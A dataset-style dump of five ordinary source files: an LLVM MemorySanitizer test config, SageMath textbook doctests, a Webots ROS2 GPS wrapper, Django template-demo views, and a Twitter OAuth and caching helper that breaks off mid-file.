max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
test/msan/lit.cfg.py | QuarkTheAwesome/compiler-rt-be-aeabi | 118 | 9489 | # -*- Python -*-
import os
# Setup config name.
config.name = 'MemorySanitizer' + getattr(config, 'name_suffix', 'default')

# Setup source root.
config.test_source_root = os.path.dirname(__file__)

# Setup default compiler flags used with -fsanitize=memory option.
# Frame pointers are kept so MSan origin/stack reports stay usable.
clang_msan_cflags = (["-fsanitize=memory",
                      "-mno-omit-leaf-frame-pointer",
                      "-fno-omit-frame-pointer",
                      "-fno-optimize-sibling-calls"] +
                     [config.target_cflags] +
                     config.debug_info_flags)

# Some Msan tests leverage backtrace() which requires libexecinfo on FreeBSD.
if config.host_os == 'FreeBSD':
  clang_msan_cflags += ["-lexecinfo", "-fPIC"]

# C++ invocations additionally carry the configured C++ mode flags.
clang_msan_cxxflags = config.cxx_mode_flags + clang_msan_cflags

# Flags for KMSAN invocation. This is C-only, we're not interested in C++.
clang_kmsan_cflags = (["-fsanitize=kernel-memory"] +
                      [config.target_cflags] +
                      config.debug_info_flags)
def build_invocation(compile_flags):
    """Return the clang command line for `compile_flags`, padded with a
    leading/trailing space so it splices cleanly into a lit substitution."""
    command_parts = [config.clang] + compile_flags
    return " {} ".format(" ".join(command_parts))
# Register %clang_msan / %clangxx_msan / %clang_kmsan for test RUN lines.
config.substitutions.append( ("%clang_msan ", build_invocation(clang_msan_cflags)) )
config.substitutions.append( ("%clangxx_msan ", build_invocation(clang_msan_cxxflags)) )
config.substitutions.append( ("%clang_kmsan ", build_invocation(clang_kmsan_cflags)) )

# Default test suffixes.
config.suffixes = ['.c', '.cc', '.cpp']

# MSan tests only run on these OSes; everything else is unsupported.
if config.host_os not in ['Linux', 'NetBSD', 'FreeBSD']:
  config.unsupported = True

# For mips64, mips64el we have forced store_context_size to 1 because these
# archs use slow unwinder which is not async signal safe. Therefore we only
# check the first frame since store_context size is 1.
if config.host_arch in ['mips64', 'mips64el']:
  config.substitutions.append( ('CHECK-%short-stack', 'CHECK-SHORT-STACK'))
else:
  config.substitutions.append( ('CHECK-%short-stack', 'CHECK-FULL-STACK'))
|
src/sage/tests/books/computational-mathematics-with-sagemath/domaines_doctest.py | hsm207/sage | 1,742 | 9498 | <filename>src/sage/tests/books/computational-mathematics-with-sagemath/domaines_doctest.py<gh_stars>1000+
## -*- encoding: utf-8 -*-
"""
This file (./domaines_doctest.sage) was *autogenerated* from ./domaines.tex,
with sagetex.sty version 2011/05/27 v2.3.1.
It contains the contents of all the sageexample environments from this file.
You should be able to doctest this file with:
sage -t ./domaines_doctest.sage
It is always safe to delete this file; it is not used in typesetting your
document.
Sage example in ./domaines.tex, line 10::
sage: x = var('x')
Sage example in ./domaines.tex, line 69::
sage: o = 12/35
sage: type(o)
<... 'sage.rings.rational.Rational'>
Sage example in ./domaines.tex, line 82::
sage: type(12/35)
<... 'sage.rings.rational.Rational'>
Sage example in ./domaines.tex, line 131::
sage: o = 720
sage: o.factor()
2^4 * 3^2 * 5
Sage example in ./domaines.tex, line 142::
sage: type(o).factor(o)
2^4 * 3^2 * 5
Sage example in ./domaines.tex, line 157::
sage: 720.factor()
2^4 * 3^2 * 5
Sage example in ./domaines.tex, line 166::
sage: o = 720 / 133
sage: o.numerator().factor()
2^4 * 3^2 * 5
Sage example in ./domaines.tex, line 253::
sage: 3 * 7
21
Sage example in ./domaines.tex, line 261::
sage: (2/3) * (6/5)
4/5
Sage example in ./domaines.tex, line 267::
sage: (1 + I) * (1 - I)
2
Sage example in ./domaines.tex, line 274::
sage: (x + 2) * (x + 1)
(x + 2)*(x + 1)
sage: (x + 1) * (x + 2)
(x + 2)*(x + 1)
Sage example in ./domaines.tex, line 308::
sage: def fourth_power(a):
....: a = a * a
....: a = a * a
....: return a
Sage example in ./domaines.tex, line 330::
sage: fourth_power(2)
16
sage: fourth_power(3/2)
81/16
sage: fourth_power(I)
1
sage: fourth_power(x+1)
(x + 1)^4
sage: M = matrix([[0,-1],[1,0]]); M
[ 0 -1]
[ 1 0]
sage: fourth_power(M)
[1 0]
[0 1]
Sage example in ./domaines.tex, line 375::
sage: t = type(5/1); t
<... 'sage.rings.rational.Rational'>
sage: t == type(5)
False
Sage example in ./domaines.tex, line 476::
sage: a = 5; a
5
sage: a.is_unit()
False
Sage example in ./domaines.tex, line 484::
sage: a = 5/1; a
5
sage: a.is_unit()
True
Sage example in ./domaines.tex, line 507::
sage: parent(5)
Integer Ring
sage: parent(5/1)
Rational Field
Sage example in ./domaines.tex, line 515::
sage: ZZ
Integer Ring
sage: QQ
Rational Field
Sage example in ./domaines.tex, line 525::
sage: QQ(5).parent()
Rational Field
sage: ZZ(5/1).parent()
Integer Ring
sage: ZZ(1/5)
Traceback (most recent call last):
...
TypeError: no conversion of this rational to integer
Sage example in ./domaines.tex, line 543::
sage: ZZ(1), QQ(1), RR(1), CC(1)
(1, 1, 1.00000000000000, 1.00000000000000)
Sage example in ./domaines.tex, line 568::
sage: cartesian_product([QQ, QQ])
The Cartesian product of (Rational Field, Rational Field)
Sage example in ./domaines.tex, line 574::
sage: ZZ.fraction_field()
Rational Field
Sage example in ./domaines.tex, line 580::
sage: ZZ['x']
Univariate Polynomial Ring in x over Integer Ring
Sage example in ./domaines.tex, line 591::
sage: Z5 = GF(5); Z5
Finite Field of size 5
sage: P = Z5['x']; P
Univariate Polynomial Ring in x over Finite Field of size 5
sage: M = MatrixSpace(P, 3, 3); M
Full MatrixSpace of 3 by 3 dense matrices over
Univariate Polynomial Ring in x over Finite Field of size 5
Sage example in ./domaines.tex, line 602::
sage: M.random_element() # random
[2*x^2 + 3*x + 4 4*x^2 + 2*x + 2 4*x^2 + 2*x]
[ 3*x 2*x^2 + x + 3 3*x^2 + 4*x]
[ 4*x^2 + 3 3*x^2 + 2*x + 4 2*x + 4]
Sage example in ./domaines.tex, line 697::
sage: QQ.category()
Join of Category of number fields and Category of quotient fields and Category of metric spaces
Sage example in ./domaines.tex, line 704::
sage: QQ in Fields()
True
Sage example in ./domaines.tex, line 712::
sage: QQ in CommutativeAdditiveGroups()
True
Sage example in ./domaines.tex, line 718::
sage: QQ['x'] in EuclideanDomains()
True
Sage example in ./domaines.tex, line 859::
sage: 5.parent()
Integer Ring
Sage example in ./domaines.tex, line 872::
sage: type(factor(4))
<class 'sage.structure.factorization_integer.IntegerFactorization'>
Sage example in ./domaines.tex, line 895::
sage: int(5)
5
sage: type(int(5))
<... 'int'>
Sage example in ./domaines.tex, line 909::
sage: Integer(5)
5
sage: type(Integer(5))
<... 'sage.rings.integer.Integer'>
Sage example in ./domaines.tex, line 926::
sage: factorial(99) / factorial(100) - 1 / 50
-1/100
Sage example in ./domaines.tex, line 974::
sage: 72/53 - 5/3 * 2.7
-3.14150943396227
Sage example in ./domaines.tex, line 982::
sage: cos(1), cos(1.)
(cos(1), 0.540302305868140)
Sage example in ./domaines.tex, line 1000::
sage: pi.n(digits=50) # variant: n(pi,digits=50)
3.1415926535897932384626433832795028841971693993751
Sage example in ./domaines.tex, line 1020::
sage: z = CC(1,2); z.arg()
1.10714871779409
Sage example in ./domaines.tex, line 1036::
sage: I.parent()
Number Field in I with defining polynomial x^2 + 1 with I = 1*I
Sage example in ./domaines.tex, line 1043::
sage: (1.+2.*I).parent()
Complex Field with 53 bits of precision
sage: (1.+2.*SR(I)).parent()
Symbolic Ring
Sage example in ./domaines.tex, line 1064::
sage: z = 3 * exp(I*pi/4)
sage: z.real(), z.imag(), z.abs().canonicalize_radical()
(3/2*sqrt(2), 3/2*sqrt(2), 3)
Sage example in ./domaines.tex, line 1094::
sage: a, b, c = 0, 2, 3
sage: a == 1 or (b == 2 and c == 3)
True
Sage example in ./domaines.tex, line 1147::
sage: x, y = var('x, y')
sage: bool( (x-y)*(x+y) == x^2-y^2 )
True
Sage example in ./domaines.tex, line 1171::
sage: Z4 = IntegerModRing(4); Z4
Ring of integers modulo 4
sage: m = Z4(7); m
3
Sage example in ./domaines.tex, line 1184::
sage: 3 * m + 1
2
Sage example in ./domaines.tex, line 1191::
sage: Z3 = GF(3); Z3
Finite Field of size 3
Sage example in ./domaines.tex, line 1243::
sage: a = matrix(QQ, [[1,2,3],[2,4,8],[3,9,27]])
sage: (a^2 + 1) * a^(-1)
[ -5 13/2 7/3]
[ 7 1 25/3]
[ 2 19/2 27]
Sage example in ./domaines.tex, line 1259::
sage: M = MatrixSpace(QQ,3,3); M
Full MatrixSpace of 3 by 3 dense matrices over Rational Field
sage: a = M([[1,2,3],[2,4,8],[3,9,27]])
sage: (a^2 + 1) * a^(-1)
[ -5 13/2 7/3]
[ 7 1 25/3]
[ 2 19/2 27]
Sage example in ./domaines.tex, line 1283::
sage: P = ZZ['x']; P
Univariate Polynomial Ring in x over Integer Ring
sage: F = P.fraction_field(); F
Fraction Field of Univariate Polynomial Ring in x over Integer Ring
sage: p = P(x+1) * P(x); p
x^2 + x
sage: p + 1/p
(x^4 + 2*x^3 + x^2 + 1)/(x^2 + x)
sage: parent(p + 1/p)
Fraction Field of Univariate Polynomial Ring in x over Integer Ring
Sage example in ./domaines.tex, line 1382::
sage: k.<a> = NumberField(x^3 + x + 1); a^3; a^4+3*a
-a - 1
-a^2 + 2*a
Sage example in ./domaines.tex, line 1416::
sage: parent(sin(x))
Symbolic Ring
Sage example in ./domaines.tex, line 1422::
sage: SR
Symbolic Ring
Sage example in ./domaines.tex, line 1428::
sage: SR.category()
Category of fields
Sage example in ./domaines.tex, line 1482::
sage: R = QQ['x1,x2,x3,x4']; R
Multivariate Polynomial Ring in x1, x2, x3, x4 over Rational Field
sage: x1, x2, x3, x4 = R.gens()
Sage example in ./domaines.tex, line 1489::
sage: x1 * (x2 - x3)
x1*x2 - x1*x3
Sage example in ./domaines.tex, line 1496::
sage: (x1+x2)*(x1-x2) - (x1^2 - x2^2)
0
Sage example in ./domaines.tex, line 1509::
sage: P = prod( (a-b) for (a,b) in Subsets([x1,x2,x3,x4],2) ); P * P.lc()
x1^3*x2^2*x3 - x1^2*x2^3*x3 - x1^3*x2*x3^2 + x1*x2^3*x3^2
+ x1^2*x2*x3^3 - x1*x2^2*x3^3 - x1^3*x2^2*x4 + x1^2*x2^3*x4
+ x1^3*x3^2*x4 - x2^3*x3^2*x4 - x1^2*x3^3*x4 + x2^2*x3^3*x4
+ x1^3*x2*x4^2 - x1*x2^3*x4^2 - x1^3*x3*x4^2 + x2^3*x3*x4^2
+ x1*x3^3*x4^2 - x2*x3^3*x4^2 - x1^2*x2*x4^3 + x1*x2^2*x4^3
+ x1^2*x3*x4^3 - x2^2*x3*x4^3 - x1*x3^2*x4^3 + x2*x3^2*x4^3
Sage example in ./domaines.tex, line 1531::
sage: x1, x2, x3, x4 = SR.var('x1, x2, x3, x4')
sage: got = prod( (a-b) for (a,b) in Subsets([x1,x2,x3,x4],2) )
sage: expected1 = -(x1 - x2)*(x1 - x3)*(x1 - x4)*(x2 - x3)*(x2 - x4)*(x3 - x4)
sage: expected2 = (x1 - x2)*(x1 - x3)*(x1 - x4)*(x2 - x3)*(x2 - x4)*(x3 - x4)
sage: bool(got == expected1 or got == expected2)
True
Sage example in ./domaines.tex, line 1581::
sage: x = var('x')
sage: p = 54*x^4+36*x^3-102*x^2-72*x-12
sage: factor(p)
6*(x^2 - 2)*(3*x + 1)^2
Sage example in ./domaines.tex, line 1616::
sage: R = ZZ['x']; R
Univariate Polynomial Ring in x over Integer Ring
Sage example in ./domaines.tex, line 1622::
sage: q = R(p); q
54*x^4 + 36*x^3 - 102*x^2 - 72*x - 12
Sage example in ./domaines.tex, line 1629::
sage: parent(q)
Univariate Polynomial Ring in x over Integer Ring
Sage example in ./domaines.tex, line 1635::
sage: factor(q)
2 * 3 * (3*x + 1)^2 * (x^2 - 2)
Sage example in ./domaines.tex, line 1642::
sage: R = QQ['x']; R
Univariate Polynomial Ring in x over Rational Field
sage: q = R(p); q
54*x^4 + 36*x^3 - 102*x^2 - 72*x - 12
sage: factor(q)
(54) * (x + 1/3)^2 * (x^2 - 2)
Sage example in ./domaines.tex, line 1665::
sage: R = ComplexField(16)['x']; R
Univariate Polynomial Ring in x over Complex Field
with 16 bits of precision
sage: q = R(p); q
54.00*x^4 + 36.00*x^3 - 102.0*x^2 - 72.00*x - 12.00
sage: factor(q)
(54.00) * (x - 1.414) * (x + 0.3333)^2 * (x + 1.414)
Sage example in ./domaines.tex, line 1685::
sage: R = QQ[sqrt(2)]['x']; R
Univariate Polynomial Ring in x over Number Field in sqrt2 with defining polynomial x^2 - 2 with sqrt2 = 1.414213562373095?
sage: q = R(p); q
54*x^4 + 36*x^3 - 102*x^2 - 72*x - 12
sage: factor(q)
(54) * (x - sqrt2) * (x + sqrt2) * (x + 1/3)^2
Sage example in ./domaines.tex, line 1698::
sage: R = GF(5)['x']; R
Univariate Polynomial Ring in x over Finite Field of size 5
sage: q = R(p); q
4*x^4 + x^3 + 3*x^2 + 3*x + 3
sage: factor(q)
(4) * (x + 2)^2 * (x^2 + 3)
"""
|
webots_ros2_core/webots_ros2_core/devices/gps_device.py | TaoYibo1866/webots_ros2 | 176 | 9500 | <reponame>TaoYibo1866/webots_ros2
# Copyright 1996-2021 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Webots GPS device wrapper for ROS2."""
import copy

from rclpy.qos import QoSReliabilityPolicy, qos_profile_sensor_data
from std_msgs.msg import Float32
from sensor_msgs.msg import NavSatFix, NavSatStatus
from geometry_msgs.msg import PointStamped

from controller import GPS

from .sensor_device import SensorDevice
class GpsDevice(SensorDevice):
    """
    ROS2 wrapper for Webots GPS node.

    Creates suitable ROS2 interface based on Webots
    [GPS](https://cyberbotics.com/doc/reference/gps) node instance:

    It allows the following functionalities:
    - Publishes position measurements of type `sensor_msgs::NavSatFix` if WGS84
    - Publishes position measurements of type `geometry_msgs::PointStamped` if LOCAL
    - Publishes ground speed of type `std_msgs::Float32`

    Args:
    ----
    node (WebotsNode): The ROS2 node.
    device_key (str): Unique identifier of the device used for configuration.
    wb_device (Gps): Webots node of type GPS.

    Kwargs:
        params (dict): Inherited from `SensorDevice` + the following::

            dict: {
                'timestep': int,   # Publish period in ms (default 128ms)
            }

    """

    def __init__(self, node, device_key, wb_device, params=None):
        super().__init__(node, device_key, wb_device, params)
        self.__speed_publisher = None
        self.__gps_publisher = None
        self.__coordinate_system = self._wb_device.getCoordinateSystem()

        # Exit if disabled
        if self._disable:
            return

        # Change default timestep
        self._timestep = 128

        # BUGFIX: copy the profile before tweaking it.  `qos_profile_sensor_data`
        # is a shared module-level object; mutating its `reliability` in place
        # (as the original code did) silently changed it for every other user
        # of that profile in the process.
        qos_sensor_reliable = copy.deepcopy(qos_profile_sensor_data)
        qos_sensor_reliable.reliability = QoSReliabilityPolicy.RELIABLE

        # Create topics
        self.__speed_publisher = node.create_publisher(
            Float32, self._topic_name + '/speed', qos_sensor_reliable)
        if self.__coordinate_system == GPS.WGS84:
            self.__gps_publisher = node.create_publisher(
                NavSatFix, self._topic_name + '/gps', qos_sensor_reliable)
        else:
            self.__gps_publisher = node.create_publisher(
                PointStamped, self._topic_name + '/gps', qos_sensor_reliable)

    def step(self):
        """Publish one GPS sample when there are subscribers (or
        `_always_publish` is set); otherwise keep the Webots device disabled."""
        stamp = super().step()
        if not stamp:
            return

        if self.__gps_publisher.get_subscription_count() > 0 or \
                self.__speed_publisher.get_subscription_count() > 0 or \
                self._always_publish:
            self._wb_device.enable(self._timestep)

            # Ground speed
            msg = Float32()
            msg.data = self._wb_device.getSpeed()
            self.__speed_publisher.publish(msg)

            # Position: read the [x, y, z] triple once instead of calling
            # getValues() per component.
            position = self._wb_device.getValues()
            if self.__coordinate_system == GPS.WGS84:
                msg = NavSatFix()
                msg.header.stamp = stamp
                msg.header.frame_id = self._frame_id
                msg.latitude = position[0]
                msg.longitude = position[1]
                msg.altitude = position[2]
                msg.position_covariance_type = NavSatFix.COVARIANCE_TYPE_UNKNOWN
                msg.status.service = NavSatStatus.SERVICE_GPS
                self.__gps_publisher.publish(msg)
            else:
                msg = PointStamped()
                msg.header.stamp = stamp
                msg.header.frame_id = self._frame_id
                msg.point.x = position[0]
                msg.point.y = position[1]
                msg.point.z = position[2]
                self.__gps_publisher.publish(msg)
        else:
            self._wb_device.disable()
|
courses/backend/django-for-everybody/Web Application Technologies and Django/resources/dj4e-samples/tmpl/views.py | Nahid-Hassan/fullstack-software-development | 297 | 9505 | <filename>courses/backend/django-for-everybody/Web Application Technologies and Django/resources/dj4e-samples/tmpl/views.py
from django.shortcuts import render
from django.views import View
# Create your views here.
def simple(request):
    """Render a minimal template with no context data."""
    template_name = 'tmpl/simple.html'
    return render(request, template_name)
def guess(request):
    """Render guess.html, supplying the single 'zap' context variable."""
    return render(request, 'tmpl/guess.html', {'zap': '42'})
def special(request):
    """Render special.html; 'txt' carries raw HTML markup in the context."""
    ctx = {}
    ctx['txt'] = '<b>bold</b>'
    ctx['zap'] = '42'
    return render(request, 'tmpl/special.html', ctx)
def loop(request):
    """Render loop.html with two lists for template iteration."""
    context = {
        'fruits': ['Apple', 'Orange', 'Banana', 'Lychee'],
        'nuts': ['peanut', 'cashew'],
        'zap': '42',
    }
    return render(request, 'tmpl/loop.html', context)
def cond(request):
    """Render cond.html with a fixed 'guess' value."""
    return render(request, 'tmpl/cond.html', {'guess': '42'})
def nested(request):
    """Render nested.html with a two-level context dictionary."""
    payload = {'outer': {'inner': '42'}}
    return render(request, 'tmpl/nested.html', payload)
# Call this with a parameter number
class GameView(View):
    """Class-based view: renders cond.html with the numeric guess from the URL."""

    def get(self, request, guess):
        return render(request, 'tmpl/cond.html', {'guess': int(guess)})
# Using inheritance (extend)
class Game2View(View):
    """Like GameView, but renders cond2.html (the template-inheritance variant)."""

    def get(self, request, guess):
        return render(request, 'tmpl/cond2.html', {'guess': int(guess)})
|
lib/twitter_utils.py | Vman45/ask-alexa-twitter | 310 | 9507 | <gh_stars>100-1000
import requests
import jsonpickle
from requests_oauthlib import OAuth1
from urllib.parse import parse_qs, urlencode
import cherrypy
from collections import defaultdict
import json
import os
import re
from collections import defaultdict
# For readable serializations: make jsonpickle emit sorted, indented JSON so
# the on-disk cache files are human-diffable.
jsonpickle.set_encoder_options('json', sort_keys=True, indent=4)
class LocalCache(object):
    """Generic class for encapsulating twitter credential caching.

    State lives in ``self.memcache`` under two top-level keys:

    * ``"server"`` -- application-wide state (consumer keys, request tokens,
      OAuth metadata).
    * ``"users"``  -- per-user state keyed by user id (access tokens, the
      user's queue of readable tweets, ...).

    The cache persists via jsonpickle into one ``<backup>.server`` file plus
    one ``<backup>.user.<id>`` file per known user.
    """

    # Filename templates for the serialized server/user state.
    server_data_template = "{}.server"
    user_data_template = "{0}.user.{1}"

    def __init__(self, backup="tmp/twitter.cache"):
        self.backup = backup  # Unique identifier for the backup of this cache
        self.memcache = {
            "users": defaultdict(lambda: {}),
            "server": defaultdict(lambda: {}),
        }
        self.deserialize()

    def users(self):
        """Return the mapping of user id -> cached user state."""
        return self.memcache['users']

    def set_user_state(self, user_id, state):
        """Replace the whole cached state dict for `user_id`."""
        self.memcache['users'][user_id] = state

    def update_user_state(self, user_id, state=None):
        """Merge `state` (a dict) into the user's cached state.

        BUGFIX: the default used to be a shared mutable ``{}``; use None to
        avoid one dict being shared across all calls.
        """
        self.memcache['users'][user_id].update(state if state is not None else {})

    def get_user_state(self, user_id):
        """Return the user's state dict ({} for unknown users)."""
        return self.memcache['users'][user_id]

    def clear_user_state(self, user_id):
        return self.memcache['users'][user_id].clear()

    def update_server_state(self, state_dict):
        self.memcache['server'].update(state_dict)

    def get_server_state(self):
        return self.memcache['server']

    def clear_server_state(self):
        return self.memcache['server'].clear()

    def initialize_user_queue(self, user_id, queue):
        """Wrap `queue` in a ReadableQueue and attach it to the user."""
        self.memcache['users'][user_id]['user_queue'] = ReadableQueue(queue)

    def user_queue(self, user_id):
        # Returns None when the user has no queue yet.
        if 'user_queue' in self.memcache['users'][user_id]:
            return self.memcache['users'][user_id]['user_queue']

    def server_fname(self):
        """Path of the serialized server-state file."""
        return self.server_data_template.format(self.backup)

    def user_fname(self, user):
        """Path of the serialized state file for one user."""
        return self.user_data_template.format(self.backup, user)

    def deserialize(self):
        """Reload cache contents from disk if a backup exists; else start empty."""
        cache_loaded = False
        if os.path.exists(self.server_fname()) and not os.path.isdir(self.backup):
            try:
                # BUGFIX: reset using defaultdicts (the constructor's layout)
                # so lookups of unknown users still return {} after a load,
                # instead of raising KeyError from a plain dict.
                self.memcache = {
                    "server": defaultdict(lambda: {}),
                    "users": defaultdict(lambda: {}),
                }
                with open(self.server_fname()) as backupfile:
                    print("Attempting to reload cache")
                    self.memcache['server'] = jsonpickle.decode(backupfile.read())
                    print("Server cache loaded", json.dumps(self.memcache, indent=4))
                for user in self.memcache['server']['user_list']:
                    # Try to load as much user data as possible
                    if os.path.exists(self.user_fname(user)):
                        print("found path for user", user)
                        with open(self.user_fname(user)) as userfile:
                            user_data = jsonpickle.decode(userfile.read())
                            self.memcache['users'][user] = user_data
                cache_loaded = True
            except Exception as e:
                print("Cache file corrupted...")
                raise e
        if not cache_loaded:
            print("Cache could not be loaded")
        else:
            print("CACHE LOADED SUCCESSFULLY!")

    def serialize(self):
        """Write server state plus every user's state back to disk."""
        json_to_serialize = self.memcache['server']
        user_list = list(self.users().keys())
        # Store the user list with the server state so deserialize() knows
        # which per-user files to look for.
        json_to_serialize.update({"user_list": user_list})
        with open(self.server_fname(), 'w') as backup_server:
            backup_server.write(jsonpickle.encode(json_to_serialize))
        for user in user_list:
            user_data = self.get_user_state(user)
            with open(self.user_fname(user), 'w') as userfile:
                userfile.write(jsonpickle.encode(user_data))
class ReadableQueue(object):
    """A cursor-tracked queue of 'readable' items (objects exposing
    ``read_out(index)``) supporting paged forward/backward traversal."""

    def __init__(self, queue=None, pos=0):
        # Store (original_index, element) pairs so read-outs can report a
        # stable 1-based position regardless of where the cursor is.
        # BUGFIX: default used to be a shared mutable [].
        items = [] if queue is None else queue
        self.hashmap = {
            "queue": [(i, e) for i, e in enumerate(items)],
            "pos": pos,
        }

    def queue(self):
        return self.hashmap['queue']

    def is_empty(self):
        return len(self.queue()) == 0

    def is_finished(self):
        return self.pos() == len(self.queue())

    def pos(self):
        return self.hashmap['pos']

    def set_pos(self, val):
        self.hashmap['pos'] = val

    def get_next(self, offset=1):
        """Return up to `offset` (index, item) pairs and advance the cursor.

        Returns None when the cursor is already at the end.
        """
        if self.pos() < len(self.queue()):
            temp_queue = self.queue()[self.pos(): self.pos() + offset]
            self.set_pos(self.pos() + offset)
            if self.pos() > len(self.queue()):
                self.set_pos(len(self.queue()))
            return temp_queue

    def read_out_next(self, offset=1):
        """Speak the next `offset` items, consuming them."""
        return " ".join([readable.read_out(index)
                         for index, readable in self.get_next(offset)])

    def has_prev(self):
        return self.pos() > 0

    def get_prev(self, offset=1):
        """Move the cursor back `offset` items and return that slice.

        BUGFIX: the slice end used to be the absolute index `offset` instead
        of `pos + offset`, so stepping back mid-queue returned an empty list.
        Returns None when the cursor is already at the start.
        """
        if self.pos() > 0:
            self.set_pos(self.pos() - offset)
            if self.pos() < 0:
                # Clamp at the front, shrinking the window accordingly, e.g.
                # pos=1, get_prev(offset=3): pos :=> -2, offset :=> 3-2 = 1,
                # pos :=> 0, then read items 0 to 1.
                offset = offset + self.pos()
                self.set_pos(0)
            return self.queue()[self.pos(): self.pos() + offset]
        return None

    def read_out_prev(self, offset=1):
        # BUGFIX: queue items are (index, readable) pairs; unpack them like
        # read_out_next does and pass the index to read_out().
        return " ".join([readable.read_out(index)
                         for index, readable in self.get_prev(offset)])
# Local cache caches tokens for different users.
# Module-level singleton shared by every function below.
local_cache = LocalCache()
def strip_html(text):
    """Get rid of ugly twitter markup and make a tweet speech-friendly.

    Leading @mentions are folded into a spoken "Replying to ..." prefix,
    remaining '@' characters are dropped, and any token containing an
    http(s) link is removed entirely.
    """
    def reply_to(text):
        replying_to = []
        split_text = text.split()
        # BUGFIX: `message` was unbound when the text consisted solely of
        # @mentions (the loop never hit the else/break), raising
        # UnboundLocalError below.
        message = []
        for index, token in enumerate(split_text):
            if token.startswith('@'):
                replying_to.append(token[1:])
            else:
                message = split_text[index:]
                break
        rply_msg = ""
        if len(replying_to) > 0:
            rply_msg = "Replying to "
            for token in replying_to[:-1]:
                rply_msg += token + ","
            if len(replying_to) > 1:
                rply_msg += 'and '
            rply_msg += replying_to[-1] + ". "
        return rply_msg + " ".join(message)

    text = reply_to(text)
    text = text.replace('@', ' ')
    # Final join also collapses any whitespace introduced above.
    return " ".join([token for token in text.split()
                     if ('http:' not in token) and ('https:' not in token)])
class Tweet(object):
    """Thin wrapper around a raw tweet JSON dict with speech-friendly helpers."""

    def __init__(self, json_obj):
        self.tweet = json_obj

    def get_id(self):
        return self.tweet['id']

    def get_raw_text(self):
        return self.tweet['text']

    def _process_text(self):
        """Strip markup, voice the '@' sign, and expand mentions to full names."""
        spoken = strip_html(self.tweet['text'])
        spoken = spoken.replace('@', 'at ')
        for mention in self.tweet['entities']['user_mentions']:
            spoken = spoken.replace(mention['screen_name'], mention['name'])
        return spoken

    def get_screen_name(self):
        return self.tweet['user']['screen_name']

    def get_user_name(self):
        return self.tweet['user']['name']

    def read_out(self, index):
        """Render a short spoken summary, numbering the tweet 1-based."""
        return "tweet number {num} by {user} : {text} ,".format(
            num=index + 1,
            user=self.get_user_name(),
            text=self._process_text())

    def detailed_description(self):
        """Render a long spoken description including author and engagement."""
        data = self.tweet
        parts = ["This tweet was posted by {user_name} whose twitter handle is {screen_name} the account description reads: {description}."
                 .format(screen_name=data['user']['screen_name'],
                         user_name=data['user']['name'],
                         description=data['user']['description'])]
        if data['retweeted']:
            parts.append("It's been retweeted {} times.".format(data['retweet_count']))
        if data['favorited']:
            parts.append("{} people have favorited it.".format(data['favorites_count']))
        if data["in_reply_to_screen_name"]:
            parts.append("it was posted in response to user {}.".format(data['in_reply_to_screen_name']))
        parts.append("the text of the tweet is, {}.".format(self._process_text()))
        return " ".join(parts)

    def user_mentions(self):
        # NOTE(review): reads a top-level 'user_mentions' key, unlike
        # _process_text which reads tweet['entities']['user_mentions'];
        # confirm which shape callers actually pass.
        return self.tweet['user_mentions']
def get_cached_access_pair(uid):
    """Return the (access_token, access_secret) pair cached for `uid`.

    Raises ValueError when the user has never completed authentication.
    """
    if uid not in local_cache.users():
        raise ValueError
    cached = local_cache.get_user_state(uid)
    return cached['access_token'], cached['access_secret']
def get_request_token(callback_url=None):
    """OAuth1 step 1: obtain a temporary request token from twitter.

    Caches the token/secret pair in the server state and returns
    (oauth_token_secret, oauth_token) -- note the secret comes first.
    """
    url = "https://api.twitter.com/oauth/request_token"
    consumer_key, consumer_secret = local_cache.get_server_state()['twitter_keys']
    auth = OAuth1(consumer_key, consumer_secret)
    params = { "oauth_callback" : callback_url }
    r = requests.post(url, auth=auth, params=params)
    # Twitter answers with a urlencoded body, not JSON.
    response_obj = parse_qs(r.text)
    local_cache.update_server_state({ "request_token" : response_obj['oauth_token'][0],
                                      "request_secret": response_obj['oauth_token_secret'][0] })
    return response_obj['oauth_token_secret'], response_obj['oauth_token']


def authenticate_user_page(callback_url="", metadata=None):
    """OAuth1 step 2: fetch twitter's 'authenticate' page HTML for the user.

    `metadata` is stashed in the server state so it can be recovered when
    the OAuth callback fires later.
    """
    url = "https://api.twitter.com/oauth/authenticate"
    oauth_secret, oauth_token = get_request_token(callback_url)
    local_cache.update_server_state({'metadata' : metadata })
    params = { "force_login" : True,
               "oauth_token": oauth_token }
    r = requests.get(url, params=params)
    return r.text
def post_tweet(user_id, message, additional_params={}):
    """
    Helper function to post a tweet
    """
    # NOTE(review): `additional_params={}` is a mutable default; it is only
    # read here (merged into a fresh dict), so it is harmless today.
    url = "https://api.twitter.com/1.1/statuses/update.json"
    params = { "status" : message }
    params.update(additional_params)
    r = make_twitter_request(url, user_id, params, request_type='POST')
    print (r.text)
    return "Successfully posted a tweet {}".format(message)
def get_access_token(oauth_token, oauth_verifier):
    """OAuth1 step 3: exchange the verified request token for an access token.

    Persists the user's credentials in the local cache and returns a
    URL-encoded fragment (state / access_token / token_type) for the client.
    """
    url = "https://api.twitter.com/oauth/access_token"
    params = {"oauth_verifier" : oauth_verifier}
    server_state = local_cache.get_server_state()
    request_token = server_state['request_token']
    request_secret = server_state['request_secret']
    consumer_key, consumer_secret = server_state['twitter_keys']
    auth = OAuth1(consumer_key, consumer_secret, request_token, request_secret)
    r = requests.post(url, params = params, auth=auth)
    response_obj = parse_qs(r.text)
    # The user's own oauth_token doubles as their cache key ("uid") below.
    uid = response_obj['oauth_token'][0]
    print ("Access token", uid)
    local_cache.set_user_state(user_id = uid,
                               state = { "access_token" : response_obj['oauth_token'][0],
                                         "access_secret" : response_obj['oauth_token_secret'][0],
                                         'twitter_user_id': response_obj['user_id'][0],
                                         'screen_name' : response_obj ['screen_name'][0]
                               })
    # Flush the whole cache to disk so the credentials survive a restart.
    local_cache.serialize()
    fragments = {
        "state" : local_cache.get_server_state()['metadata']['state'],
        "access_token" : uid,
        "token_type" : "Bearer"
    }
    return urlencode(fragments)
def get_twitter_auth(user_id):
